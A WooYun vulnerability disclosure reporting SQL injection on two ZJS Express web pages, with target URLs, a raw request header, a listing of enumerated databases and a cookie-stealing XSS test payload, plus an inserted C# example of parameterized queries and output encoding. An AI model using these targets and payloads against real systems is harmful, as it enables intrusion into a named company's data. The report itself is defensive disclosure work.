Vulnerability Summary

Defect ID: wooyun-2015-0111924

Title: SQL injection on the 宅急送 (ZJS Express) official website affecting multiple databases, including E2, OA and recruitment

Vendor: zjs.com.cn

Author: 路人甲

Submitted: 2015-05-04 16:26

Fix time: 2015-05-09 16:28

Disclosure time: 2015-05-09 16:28

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:

Vulnerability Details

Disclosure status:

2015-05-04: Details sent to the vendor; awaiting the vendor's response
2015-05-09: Vendor chose to ignore the vulnerability; details disclosed to the public

Brief description:

Injection

Detailed description:

Two pages on the official website pass POST data into SQL without filtering, resulting in SQL injection. They are:

http://www.zjs.com.cn/ws_hr/ws_recruitment_index.aspx

http://www.zjs.com.cn/ws_news/ws_news_newssearch.aspx

POST /ws_news/ws_news_newssearch.aspx HTTP/1.1
Host: www.zjs.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.zjs.com.cn/ws_news/ws_news_newssearch.aspx
Cookie: ASP.NET_SessionId=jbilzrvrru35gxft3lxcc0e1; BIGipServerwww_pool=209783306.20992.0000
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 10325

As a bonus, a POST-based XSS. It is not easy to exploit, but still deserves attention:

http://www.zjs.com.cn/ws_business/ws_internal_previewarea.aspx
SearchArea=<script>alert(document.cookie)</script>
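To show the defensive side of both findings, here is an added example, not code from zjs.com.cn or from the report: a WebForms-style news-search handler for SQL Server, first in the concatenated shape the report describes, then with bound parameters, plus HTML-encoded output for the reflected SearchArea value. The POST field names SKey and condition are taken from the report's request; the News table, its columns and the method names are assumptions.

```csharp
// Added example (not code from zjs.com.cn or the report). The News table,
// its columns and these method names are assumptions for illustration.
using System;
using System.Data;
using System.Data.SqlClient;
using System.Web;

public static class NewsSearch
{
    // Unsafe: the raw POST fields become part of the SQL text, so a quote or
    // comment sequence in SKey (or a non-numeric condition) changes the
    // statement that the database executes. This is the defect class the
    // report describes on ws_news_newssearch.aspx and ws_recruitment_index.aspx.
    public static string BuildUnsafeSql(string sKey, string condition)
    {
        return "SELECT Title, PubDate FROM News WHERE Category = " + condition +
               " AND Title LIKE '%" + sKey + "%'";
    }

    // Safe: the same query with the values bound as typed parameters. The
    // inputs are data only and are never parsed as SQL, whatever they contain.
    public static SqlCommand BuildSafeCommand(SqlConnection conn, string sKey, string condition)
    {
        int category;
        if (!int.TryParse(condition, out category))
            throw new ArgumentException("condition must be an integer");

        var cmd = new SqlCommand(
            "SELECT Title, PubDate FROM News WHERE Category = @category AND Title LIKE @pattern",
            conn);
        cmd.Parameters.Add("@category", SqlDbType.Int).Value = category;
        // The LIKE wildcards are added here, not by the caller, so the parameter
        // stays a plain string; escape % and _ if literal matches are required.
        cmd.Parameters.Add("@pattern", SqlDbType.NVarChar, 200).Value = "%" + sKey + "%";
        return cmd;
    }

    // For the SearchArea reflection on ws_internal_previewarea.aspx: encode at
    // output time so a submitted <script> tag is rendered as text, not markup.
    public static string RenderSearchArea(string searchArea)
    {
        return "<span class=\"area\">" + HttpUtility.HtmlEncode(searchArea) + "</span>";
    }
}
```

The report does not say whether ASP.NET request validation was disabled on these pages; output encoding as in RenderSearchArea protects the response regardless of that setting.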

Proof of vulnerability:

[*] ASPState
[*] E2
[*] E2_PUB
[*] Forum
[*] IMS_CRM
[*] IMS_HR
[*] IMS_HR_BAK
[*] IMS_LOG
[*] IMS_OA
[*] IMS_PDA
[*] IMS_PUB
[*] IMS_VOTE
[*] master
[*] model
[*] msdb
[*] tempdb
[*] ZJSOA


Fix recommendation:

Copyright notice: when reposting, please credit the source 路人甲@乌云


Vulnerability Response

Vendor response:

Severity: No impact, ignored by vendor

Ignored at: 2015-05-09 16:28

Vendor reply:

Vulnerability Rank: 15 (WooYun assessment)

Latest status:

None yet


Vulnerability evaluation:

Comments

  1. 2015-05-04 19:59 | ../../ ( Passerby | Rank:2 Vulnerabilities:2 )

    黑狗, I know it's you!

  2. 2015-05-04 21:55 | z7y ( Intern White Hat | Rank:57 Vulnerabilities:9 | Interested in technology and network security )

    黑狗, I know it's you!

  3. 2015-05-05 01:50 | _Thorns ( Regular White Hat | Rank:882 Vulnerabilities:157 | Buying wb at 1:5, unlimited quantity [platform escrow] )

    黑狗, I know it's you!